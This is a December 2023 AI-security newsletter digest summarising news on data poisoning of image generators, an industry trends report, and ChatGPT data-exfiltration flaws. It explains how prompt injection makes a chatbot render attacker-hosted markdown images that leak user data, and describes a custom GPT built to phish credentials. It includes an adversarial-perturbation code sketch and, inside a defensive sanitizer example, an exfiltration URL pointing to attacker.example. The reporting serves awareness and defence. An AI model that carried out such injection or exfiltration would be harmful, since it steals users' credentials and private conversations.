Towards Secure AI Week 51 – The Hidden Cybersecurity Battles

Secure AI Weekly + Trusted AI Blog, December 27, 2023


Data poisoning: how artists are sabotaging AI to take revenge on image generators

The Conversation, December 17, 2023

Consider this scenario: You’re preparing a presentation and require an image of a balloon. Opting for a text-to-image generator like Midjourney or DALL-E, you input “red balloon against a blue sky.” Unexpectedly, the generator produces an image of an egg, and a second attempt yields a watermelon image. This puzzling result could be due to ‘data poisoning,’ a significant concern in the realm of AI security and safety. Data poisoning occurs when AI models are trained on corrupted data, leading to inaccurate or unpredictable outputs. This issue becomes particularly prevalent when AI systems use indiscriminately scraped online images, which may include copyrighted material, contributing to legal disputes and challenging the integrity of the AI’s learning process.

A response to this issue is the development of tools like “Nightshade,” designed to empower artists against unauthorized use of their images. These tools subtly modify images in ways that confuse AI models while appearing normal to humans. If such altered images are used in training AI models, the integrity of the data pool is compromised, leading to misclassifications and erratic results. This phenomenon is not just a technical glitch but reflects a broader challenge in the field of AI: ensuring the ethical use and sourcing of data. The consequences of data poisoning extend beyond single instances, potentially affecting related keywords and thus the overall reliability of AI systems.
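For illustration, the sketch below shows the general principle behind such perturbation tools, assuming PyTorch and an off-the-shelf ImageNet classifier: a bounded, near-invisible pixel change is optimized so the model reads the image as a different concept. This is a generic gradient-based perturbation for demonstration only, not Nightshade’s actual algorithm, and the file name, target class, and step sizes are arbitrary assumptions.

```python
# A minimal sketch of the principle behind perturbation tools such as Nightshade
# (NOT its actual algorithm): optimize a small, bounded pixel change so a vision
# model reads the image as a different concept, while the change stays
# imperceptible to a human viewer. Model, file name, target class, and step
# sizes are illustrative assumptions.
import torch
import torchvision.models as models
import torchvision.transforms as T
from PIL import Image

model = models.resnet18(weights=models.ResNet18_Weights.DEFAULT).eval()
preprocess = T.Compose([T.Resize(224), T.CenterCrop(224), T.ToTensor()])

image = preprocess(Image.open("balloon.jpg")).unsqueeze(0)  # hypothetical input image
target_class = 948                  # hypothetical "wrong" ImageNet class to steer towards
epsilon = 4 / 255                   # maximum per-pixel change, well below visibility
delta = torch.zeros_like(image, requires_grad=True)

for _ in range(50):
    loss = torch.nn.functional.cross_entropy(
        model(image + delta), torch.tensor([target_class])
    )
    loss.backward()
    with torch.no_grad():
        delta -= 0.5 / 255 * delta.grad.sign()  # step towards the target concept
        delta.clamp_(-epsilon, epsilon)         # keep the perturbation imperceptible
    delta.grad.zero_()

perturbed = (image + delta).clamp(0, 1)  # still looks like a balloon to a person
```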

To mitigate these risks, stakeholders are exploring solutions that emphasize ethical data sourcing and usage. This approach challenges the long-held belief that online data is fair game for any purpose. Technological fixes such as ‘ensemble modeling’ and regular audits using well-curated test datasets are also being considered. These measures, alongside a growing recognition of the need for ethical AI practices, highlight the importance of addressing security and safety concerns in AI development. Data poisoning, by bringing these issues to the forefront, not only impacts AI technology but also sparks a necessary conversation about the moral rights of individuals and artists in the digital age.
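As a rough illustration of the ‘ensemble modeling’ and audit ideas, the sketch below, assuming scikit-learn and NumPy-style arrays, trains several models on disjoint shards of the training data and scores each one against a small, well-curated audit set; a shard whose model scores noticeably below the rest is a candidate for containing poisoned samples. The shard count, model choice, and tolerance threshold are illustrative assumptions, not a prescribed defense.

```python
# A minimal sketch of ensemble-style auditing against data poisoning, assuming
# scikit-learn and NumPy arrays. Shard count, model choice, and tolerance are
# illustrative assumptions rather than recommended settings.
import numpy as np
from sklearn.ensemble import RandomForestClassifier

def audit_shards(X_train, y_train, X_audit, y_audit, n_shards=5, tolerance=0.10):
    """Train one model per data shard and flag shards whose model underperforms
    on a small, well-curated audit set."""
    shard_indices = np.array_split(np.random.permutation(len(X_train)), n_shards)
    scores = []
    for idx in shard_indices:
        model = RandomForestClassifier(n_estimators=100).fit(X_train[idx], y_train[idx])
        scores.append(model.score(X_audit, y_audit))  # accuracy on the curated audit set
    median = float(np.median(scores))
    suspects = [i for i, s in enumerate(scores) if s < median - tolerance]
    return scores, suspects  # shards scoring well below the median warrant manual review
```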

Security Megatrends: The 2024 Vision for the Security Industry

Security Industry Association, December 2023

Gleaning insights from a blend of independent research, expert focus groups, and key discussions at the Securing New Ground (SNG) conference, the Security Industry Association (SIA) annually releases its influential “Security Megatrends” report. The 2024 edition, unveiled in December 2023, offers a forward-looking analysis of the security industry, pinpointing crucial trends that will shape business and operational strategies in the coming year. The report underscores the paramount role of artificial intelligence (AI) in the security sector, highlighting its multifaceted impact and dividing it into four distinct trends: AI security, visual intelligence that transcends traditional video surveillance, the rise of generative AI, and the regulatory landscape surrounding AI. Additionally, it acknowledges the evolution of previously emerging trends like workforce development, cloud technology, cybersecurity, global tensions, and sustainability. These have now become foundational elements of the security industry, essential considerations for all leaders navigating this dynamic field.

The comprehensive 2024 Security Megatrends report, accessible for download, presents an array of data and statistics on contemporary topics crucial to the industry. These include the development of autonomous devices, advancements in quantum computing and post-quantum cryptography, and the shift towards minimizing physical credentials. This detailed information helps paint a picture of the industry’s current state and provides insights into its future direction. The report not only offers a snapshot of today’s security landscape but also acts as a predictive tool, guiding industry players in adapting to upcoming changes and challenges.

Key highlights of the 2024 report encompass a diverse range of topics that are reshaping the security industry. First and foremost is the multifaceted role of AI, which includes aspects like ensuring AI security, harnessing AI for visual intelligence beyond conventional surveillance, understanding the implications of generative AI, and navigating the evolving regulatory framework governing AI usage. The report also sheds light on the changing nature of security’s return on investment and the transformation of business models due to the adoption of Security as a Service. The influence of major technology companies, shifts in real estate optimization strategies, and the convergence of Information Technology (IT) and Operational Technology (OT) are other critical areas of focus. Additionally, the report delves into the economic shifts impacting security business models and the ethical, trust, and cybersecurity concerns associated with AI, offering a comprehensive overview essential for anyone involved in the security industry.

OpenAI releases ChatGPT data leak patch, but the issue isn’t completely fixed

Mashable, December 22, 2023

The imperative of maintaining strict confidentiality when interacting with ChatGPT, a product of OpenAI, cannot be overstated. Users are advised to avoid inputting sensitive information, as the platform has previously shown vulnerabilities that could potentially be exploited by unauthorized parties. Despite efforts by OpenAI to address these security concerns, recent events indicate that the risk of data breaches still exists. A report by Bleeping Computer highlighted a significant issue where ChatGPT could inadvertently expose user data, including personal conversations and metadata such as user IDs and session information, to unauthorized third parties. This revelation underscores the ongoing challenge of safeguarding user privacy in AI-powered platforms.

In a concerning development, security researcher Johann Rehberger discovered and exploited a flaw in OpenAI’s recently introduced custom GPTs feature. By creating a custom GPT, Rehberger demonstrated the possibility of extracting data from ChatGPT. This finding is particularly alarming considering the potential of custom GPTs, which are touted as revolutionary in the realm of AI applications, akin to the impact of the App Store on mobile apps. The ease with which Rehberger developed this custom GPT raises the specter of malicious actors using similar methods to obtain sensitive data from unsuspecting users. This incident serves as a stark reminder of the vulnerabilities inherent in emerging technologies and the importance of continuous vigilance in cybersecurity.

Rehberger first brought this “data exfiltration technique” to OpenAI’s attention in April and further elaborated on his method in November. Following this, OpenAI issued a patch to address the leak. Rehberger, on his website, acknowledged the effort as a positive step towards mitigating the vulnerability, although he suggested that the fix was not entirely comprehensive. This ongoing situation with ChatGPT highlights a critical aspect of AI development and deployment: the need for robust security measures to protect against data breaches. It serves as a cautionary tale for both developers and users of AI technologies, emphasizing the importance of prioritizing security and safety in this rapidly evolving field.

Malicious GPT Can Phish Credentials, Exfiltrate Them to External Server: Researcher

SecurityWeek, December 22, 2023

A recent discovery highlights a significant vulnerability in artificial intelligence systems, specifically in the domain of Generative Pre-trained Transformers (GPTs): malicious actors can create custom GPTs capable of phishing for user credentials and transmitting that sensitive information to an external server. Researchers Johann Rehberger and Roman Samoilenko independently identified the underlying security flaw in ChatGPT in the spring of 2023. They found that ChatGPT was susceptible to a prompt injection attack that manipulates the chatbot into rendering attacker-controlled markdown images. The flaw allows attackers to extract sensitive information from users’ interactions with ChatGPT, either by duping them into pasting harmful content copied from a malicious website or by prompting ChatGPT to summarize a web page embedded with specially crafted instructions.

The exploit’s mechanism relies on markdown images processed by ChatGPT, which can be as subtle as a single-pixel image hosted on the attacker’s site whose URL carries the stolen data in its query string. Initially, when OpenAI, the creators of ChatGPT, were informed about this attack method, they did not plan to address it, considering it a feature rather than a flaw. In contrast, similar issues found in other chatbots, such as Bing Chat, Google’s Bard, and Anthropic’s Claude, were quickly fixed by their developers. Recently, OpenAI began implementing measures to mitigate the attack, specifically for the web application. These mitigations are not foolproof and do not extend to the mobile applications, but they are seen as a step in the right direction. In November, OpenAI enabled Plus and Enterprise users of ChatGPT to create their own custom GPTs for particular tasks or themes, raising concerns about the potential misuse of this feature.
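To make the mitigation class concrete, the sketch below shows one conceptual approach, assuming a Python rendering pipeline: markdown images in model output are only rendered when their URL points to an allow-listed host, so a prompt-injected single-pixel image cannot smuggle conversation data to an attacker’s server through its query string. This is an illustration of the idea only, not OpenAI’s actual implementation; the host names are hypothetical.

```python
# A conceptual sketch of an allow-list check on markdown image URLs before
# rendering chatbot output. Not OpenAI's implementation; hosts are hypothetical.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical trusted image hosts
MD_IMAGE = re.compile(r"!\[[^\]]*\]\((?P<url>[^)\s]+)[^)]*\)")

def sanitize_markdown(text: str) -> str:
    def check(match: re.Match) -> str:
        host = urlparse(match.group("url")).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)                 # keep images from trusted hosts
        return "[image removed: untrusted host]"  # drop the potential exfiltration channel
    return MD_IMAGE.sub(check, text)

# Example: a single-pixel image whose URL smuggles data out in the query string
leaky_output = "Thanks for playing! ![](https://attacker.example/p.png?data=user%20secret)"
print(sanitize_markdown(leaky_output))
```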

Exploiting this new functionality, Rehberger developed a deceptive custom GPT named ‘The Thief’, designed to trick users into revealing their email addresses and passwords. The GPT, masquerading as a Tic-tac-toe game, asks for the user’s email address for a ‘personalized experience’ and a password as part of a ‘security process.’ Unbeknownst to the user, this information is then clandestinely sent to an attacker-controlled server. Prior to OpenAI rolling out mitigations on December 12, Rehberger published a blog post outlining how the image markdown injection issue could be leveraged, particularly in conjunction with custom versions of ChatGPT. He also highlighted the risk of malicious GPTs being published on the official GPT Store, despite OpenAI’s system designed to prevent the publishing of overtly malicious GPTs. This development underscores the complex security challenges in AI, where innovative features can inadvertently create opportunities for cyber threats, necessitating continuous and proactive security measures.

 
